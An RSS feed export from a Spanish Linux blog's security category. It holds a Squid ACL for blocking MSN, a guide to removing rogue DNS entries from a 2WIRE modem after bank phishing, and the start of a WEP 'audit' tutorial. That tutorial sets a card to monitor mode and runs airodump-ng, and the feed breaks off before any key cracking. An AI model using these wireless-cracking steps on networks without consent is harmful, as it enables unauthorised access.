<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Vive-libre.com &#187; SEGURIDAD</title>
	<atom:link href="http://vive-libre.com/blog/category/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://vive-libre.com/blog</link>
	<description>Un espacio, para la libertad.</description>
	<lastBuildDate>Thu, 24 Dec 2009 18:25:15 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Squid Proxy: Acl para bloquear msn</title>
		<link>http://vive-libre.com/blog/2009/03/12/squid-proxy-acl-para-bloquear-msn/</link>
		<comments>http://vive-libre.com/blog/2009/03/12/squid-proxy-acl-para-bloquear-msn/#comments</comments>
		<pubDate>Thu, 12 Mar 2009 03:20:38 +0000</pubDate>
		<dc:creator>yovany</dc:creator>
				<category><![CDATA[LINUX]]></category>
		<category><![CDATA[PROXY]]></category>
		<category><![CDATA[SEGURIDAD]]></category>
		<category><![CDATA[SQUID]]></category>
		<category><![CDATA[UBUNTU]]></category>
		<category><![CDATA[BLOQUEO]]></category>
		<category><![CDATA[MSN]]></category>
		<category><![CDATA[REGLAS]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/2009/03/12/squid-proxy-acl-para-bloquear-msn/</guid>
		<description><![CDATA[Hay varias formas para boquear el acceso al msn, ya sea por iptables o en este caso por el proxy, esta es una que yo uso y me ha funcionado muy bien.
PLAIN TEXT
CODE:




acl msn_port port 1863


acl msn_method method POST


acl msn_url url_regex -i gateway.dll


acl msn_messenger rep_mime_type -i ^application/x-msn-messenger$


acl red_local src 192.168.2.0/24


acl plus src "/etc/squid/plus.lst"


&#160;


http_access deny red_local [...]]]></description>
			<content:encoded><![CDATA[<p>Hay varias formas para boquear el acceso al msn, ya sea por iptables o en este caso por el proxy, esta es una que yo uso y me ha funcionado muy bien.</p>
<div class="igBar"><span id="lcode-7"><a href="#" onclick="javascript:showPlainTxt('code-7'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-7">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_port port <span style="color:#800000;color:#800000;">1863</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_method method POST</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_url url_regex -i gateway.<span style="">dll</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_messenger rep_mime_type -i ^application/x-msn-messenger$</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl red_local src <span style="color:#800000;color:#800000;">192</span>.<span style="color:#800000;color:#800000;">168</span>.<span style="color:#800000;color:#800000;">2</span>.<span style="color:#800000;color:#800000;">0</span>/<span style="color:#800000;color:#800000;">24</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl plus src <span style="color:#CC0000;">"/etc/squid/plus.lst"</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">http_access deny red_local !plus msn_method msn_url</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">http_access deny red_local !plus msn_port</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">http_access deny red_local !plus msn_messenger </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Esto quiere decir lo siguiente</p>
<p>Vamos a bloquear todas las posibles salidas que pueda tener el msn, una sera bloquear las conexiones que se realicen por el puerto 1863</p>
<div class="igBar"><span id="lcode-8"><a href="#" onclick="javascript:showPlainTxt('code-8'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-8">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_port port <span style="color:#800000;color:#800000;">1863</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Tambien bloquearemos el metodo de POST  y la gateway.dll</p>
<div class="igBar"><span id="lcode-9"><a href="#" onclick="javascript:showPlainTxt('code-9'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-9">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_method method POST</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_url url_regex -i gateway.<span style="">dll</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Tambien lo bloquearemos el mime, por este metodo se puede bloquear cualquer aplicacion solo hay que indicar el mime  correspondiente.</p>
<div class="igBar"><span id="lcode-10"><a href="#" onclick="javascript:showPlainTxt('code-10'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-10">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl msn_messenger rep_mime_type -i ^application/x-msn-messenger$ </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Indicamos dos reglas mas que nos permitiran definir las red interna y una lista de Ip a las cuales se les concedera el acceso a esta aplicacion, esta lista es una archivo de texto plano con las direcciones ip en forma de lista, en nuestro caso la lista esta en el directorio /etc//etc/squid/ y se llama plus.lst</p>
<div class="igBar"><span id="lcode-11"><a href="#" onclick="javascript:showPlainTxt('code-11'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-11">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl red_local src <span style="color:#800000;color:#800000;">192</span>.<span style="color:#800000;color:#800000;">168</span>.<span style="color:#800000;color:#800000;">2</span>.<span style="color:#800000;color:#800000;">0</span>/<span style="color:#800000;color:#800000;">24</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">acl plus src <span style="color:#CC0000;">"/etc/squid/plus.lst"</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Ahora solo hay que aplicar las reglas denegamos el acceso al puerto, por el metodo Post, gateway y mime, a todas las ip conformadas por la red_local 192.168.2.0/24 que sean diferentes de las ip en el archivo plus.lst</p>
<div class="igBar"><span id="lcode-12"><a href="#" onclick="javascript:showPlainTxt('code-12'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-12">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">http_access deny red_local !plus msn_method msn_url</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">http_access deny red_local !plus msn_port</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">http_access deny red_local !plus msn_messenger </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Espero les sea de utilidad</p>
<p>Saludos</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2009/03/12/squid-proxy-acl-para-bloquear-msn/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Solucionar problema con BANAMEX e Infinitum.</title>
		<link>http://vive-libre.com/blog/2008/03/17/solucionar-problema-con-banamex-e-infinitum/</link>
		<comments>http://vive-libre.com/blog/2008/03/17/solucionar-problema-con-banamex-e-infinitum/#comments</comments>
		<pubDate>Mon, 17 Mar 2008 21:54:40 +0000</pubDate>
		<dc:creator>yovany</dc:creator>
				<category><![CDATA[LINUX]]></category>
		<category><![CDATA[SEGURIDAD]]></category>
		<category><![CDATA[UBUNTU]]></category>
		<category><![CDATA[2WIRE]]></category>
		<category><![CDATA[BANAMEX]]></category>
		<category><![CDATA[FISHING]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/2008/03/17/solucionar-problema-con-banamex-e-infinitum/</guid>
		<description><![CDATA[Pues son muy bien conocidas las vulnerabilidades de los modem 2WIRE, que distribuye TELMEX, con su servicio de internet de banda ancha (Infiernitum perdon) Infinitum, ademas de que en dos minutos puedes descifrar las claves WEP (encriptado que trae por default) que protegen el acceso al modem, los usuarios de la banca por Internet de [...]]]></description>
			<content:encoded><![CDATA[<p>Pues son muy bien conocidas las vulnerabilidades de los modem 2WIRE, que distribuye TELMEX, con su servicio de internet de banda ancha (Infiernitum perdon) Infinitum, ademas de que en dos minutos puedes descifrar las claves WEP (encriptado que trae por default) que protegen el acceso al modem, los usuarios de la banca por Internet de Banamex, han presentado problemas por ataques de fishing, esto es que una vez que tienen acceso al modem, es facil modificar los DNS, para redireccionar, hacia donde uno quiera, las paginas deseadas, por consiguiente las paginas que se redireccionan son las de Banamex, hacia pagina clones donde solo esperan a que demos nuestro usuario y password para hacer movimientos dentro de nuestras cuentas (sin autorizacion de nosotros <img src='http://vive-libre.com/blog/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' />    ).</p>
<p>Si tenemos problemas para acceder, nos muestra el error  404 o en su defecto otras paginas, hay que hacer lo siguiente, (Llamar a banamex para que desactiven la banca x internet de nuestra cuanta mientras nos aseguramos que todo esta en orden)</p>
<p>Ahora  abrimos nuestro navegador de confianza (obvio firefox bueno el que gusten) y tecleamos en la barra de navegacion lo siguiente:</p>
<div class="igBar"><span id="lcode-16"><a href="#" onclick="javascript:showPlainTxt('code-16'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-16">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">192</span>.<span style="color:#800000;color:#800000;">168</span>.<span style="color:#800000;color:#800000;">1</span>.<span style="color:#800000;color:#800000;">254</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Que es la direccion de nuestro modem 2WIRE o bien</p>
<div class="igBar"><span id="lcode-17"><a href="#" onclick="javascript:showPlainTxt('code-17'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-17">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">home </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Habiendo hecho esto nos deberia de mostrar esto.</p>
<p><img src="http://lh5.google.com/blue.star.boy/R97u4wDvUyI/AAAAAAAAA1Q/qpXovzpdcv8/s400/3.PNG" /></p>
<p>Ahora tenemos que entrar a la consola de administracion y diagnostico, para esto tecleamos despues de la direccion que esta en el navegador, suponiedo que hubieramos entrado con home tendriamos que tener algo asi</p>
<div class="igBar"><span id="lcode-18"><a href="#" onclick="javascript:showPlainTxt('code-18'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-18">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">http:<span style="color:#FF9933; font-style:italic;">//home/mdc </span></div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Si esta configurado nos pedira un password y al introducirlo deberemos ver esto</p>
<p>(Si no lo sabemos hay que dar click en "No recuerdo la contraseña" nos mostrara un recordatorio si aun asi no lo sabemos hay que dar click en "Todavia no recuerdo la contraseña" y nos mostrara un formulario para estblecer la nueva contraseña)</p>
<p><img src="http://lh5.google.com/blue.star.boy/R97u4wDvUwI/AAAAAAAAA1A/_CeGTfdO6Zo/s400/1.PNG" /></p>
<p>Ahoro hay que dar click en donde dice "Resolucion de DNS"</p>
<p>Nos mostrara una pagina, donde no deveremos tenar absolutamente nada en la lista de abajo si tenemos algo es por que fuimos vunerados en la seguridad.</p>
<p><img src="http://lh5.google.com/blue.star.boy/R97u4wDvUxI/AAAAAAAAA1I/O4INJbhpRHU/s400/2.PNG" /></p>
<p>Para solucionar, esto solo hay que dar click en el boton de "QUITAR", Y asunto solucionado.</p>
<p>Pero ahora, si ya pudieron entrar es por que conocen la WEP key, entonces debemos cambiar la contraseña, y activar el  cifrado WPA, para evitar que esto vuelva a pasar.</p>
<p>Y esto se puede hacer cada ves que uno quiera hacer movimientos en la Banca por Internet, para verificar que nuestras operaciones son seguras.  ; D</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2008/03/17/solucionar-problema-con-banamex-e-infinitum/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Adutoria de seguridad wireless con ipw3945 ubuntu y aircrack</title>
		<link>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/</link>
		<comments>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/#comments</comments>
		<pubDate>Thu, 06 Mar 2008 02:38:33 +0000</pubDate>
		<dc:creator>yovany</dc:creator>
				<category><![CDATA[LINUX]]></category>
		<category><![CDATA[SEGURIDAD]]></category>
		<category><![CDATA[UBUNTU]]></category>
		<category><![CDATA[WIRELESS]]></category>
		<category><![CDATA[AIRCRACK]]></category>
		<category><![CDATA[AUDITORIA]]></category>
		<category><![CDATA[IPW3945]]></category>
		<category><![CDATA[IPWRAW]]></category>
		<category><![CDATA[WEP]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/</guid>
		<description><![CDATA[En vista al interes de  muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.
Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner [...]]]></description>
			<content:encoded><![CDATA[<p>En vista al interes de  muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.</p>
<p>Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner en evidencia la inseguridad que representa usar el cifrado WEP en las redes wireless, y que las pruebas que podamos efectuar, siempre sea dentro de redes en las cuales tengamos total concentimiento de sus administradores o propietarios, aclarado este punto continuemos con lo que nos interesa.</p>
<p>Esta informacion esta comprobada para las versiones 7.4 y 7.10, cuando instalamos ubuntu en nuestro equipo, por defecto instala la tarjeta de red con el modulo IPW394 (Intel ProWireless 3945 ABG), para poder hacer la auditoria, es necesario poder poner la tarjeta en modo monitor, lo cual no es posible con este modulo, por lo que es necario instalar los modulos IPWRAW</p>
<p>Antes de instalar el ipwraw debemos instalar algunas dependencias, esto lo hacemos de la siguiente forma</p>
<div class="igBar"><span id="lcode-41"><a href="#" onclick="javascript:showPlainTxt('code-41'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-41">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">$ sudo apt-get install - build-essential</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">$ sudo apt-get install - linux-ubuntu-modules-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-restricted-modules-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-image-debug-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-image-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-headers-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Aqui (uname -r), nos sirve para devolver la version del kernel que tenemos instalado, asi no tendremos problemas para instalar los paquetes que requerimos.</p>
<p>Si no hemos tenido ningun error hasta aqui, continuamos con la instalacion de ipwraw</p>
<p>descargamos las fuentes</p>
<div class="igBar"><span id="lcode-42"><a href="#" onclick="javascript:showPlainTxt('code-42'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-42">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">wget http:<span style="color:#FF9933; font-style:italic;">//dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2 </span></div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Descomprimimos el paquete,</p>
<div class="igBar"><span id="lcode-43"><a href="#" onclick="javascript:showPlainTxt('code-43'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-43">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">tar -xjf ipwraw-ng-<span style="color:#800000;color:#800000;">2</span>.<span style="color:#800000;color:#800000;">3</span>.<span style="color:#800000;color:#800000;">4</span>-<span style="color:#800000;color:#800000;">04022008</span>.<span style="">tar</span>.<span style="">bz2</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Para instalar, nos cambiamos a la carpeta que se acaba de generar, y tecleamos.</p>
<div class="igBar"><span id="lcode-44"><a href="#" onclick="javascript:showPlainTxt('code-44'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-44">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo make</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo make install</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo make install_ucode </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Con esto ya esta instalado el modulo, pero ahora lo agregaremos a la black list, esto para que no lo carge por defecto si no, solo cuando lo necesitemos.</p>
<div class="igBar"><span id="lcode-45"><a href="#" onclick="javascript:showPlainTxt('code-45'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-45">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">echo “blacklist ipwraw” | sudo tee /etc/modprobe.<span style="">d</span>/ipwraw</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo depmod -ae </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Ya tenemos todo listo, para poder usar el ipwraw ahora solo hay desmontar el driver ipw3945 y cargar el ipwraw</p>
<div class="igBar"><span id="lcode-46"><a href="#" onclick="javascript:showPlainTxt('code-46'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-46">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe -r ipw3945</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe ipwraw </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Para cargar el ipw3945, hacemos lo mismo, pero al contrario.</p>
<div class="igBar"><span id="lcode-47"><a href="#" onclick="javascript:showPlainTxt('code-47'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-47">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe -r ipwraw</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe ipw3945 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Despues de montar y desmontar los driver's hay que esperar un poco para que se efectuen los cambios.</p>
<p>Para comprobar, que esten funcionando, tecleamos lo siguiente.</p>
<div class="igBar"><span id="lcode-48"><a href="#" onclick="javascript:showPlainTxt('code-48'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-48">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">iwconfig </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y devemos obtener algo como esto.</p>
<div class="igBar"><span id="lcode-49"><a href="#" onclick="javascript:showPlainTxt('code-49'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-49">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">lo&nbsp; &nbsp; &nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">eth0</span>&nbsp; &nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">vmnet1</span>&nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">vmnet8</span>&nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">eth1</span>&nbsp; &nbsp; &nbsp; unassociated&nbsp; ESSID:off/any</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Mode:Monitor&nbsp; Channel=<span style="color:#800000;color:#800000;">1</span>&nbsp; Bit Rate=<span style="color:#800000;color:#800000;">54</span> Mb/s</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">rtap0&nbsp; &nbsp; &nbsp;no wireless extensions. </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Tal vez puedas obtener wifi0 en lugar de eth1</p>
<p>Para efectuar la auditoria necesitaremos la suite aircrack si no la tenemos instalada lo hacemos con esto.</p>
<div class="igBar"><span id="lcode-50"><a href="#" onclick="javascript:showPlainTxt('code-50'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-50">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo apt-get install aircrack-ng </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Listo, ahora empezaremos por averiguar cuales son los acces points accesibles</p>
<div class="igBar"><span id="lcode-51"><a href="#" onclick="javascript:showPlainTxt('code-51'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-51">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">airodump-ng rtap0 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y deberiamos obtener algo parecido a esto.</p>
<div class="igBar"><span id="lcode-52"><a href="#" onclick="javascript:showPlainTxt('code-52'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-52">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">CH&nbsp; <span style="color:#800000;color:#800000;">0</span> <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> Elapsed: <span style="color:#800000;color:#800000;">8</span> s <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> <span style="color:#800000;color:#800000;">2008</span>-<span style="color:#800000;color:#800000;">03</span>-<span style="color:#800000;color:#800000;">05</span> <span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">01</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR&nbsp; Beacons&nbsp; &nbsp; #Data, #/s&nbsp; CH&nbsp; MB&nbsp; ENC&nbsp; CIPHER AUTH ESSID</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
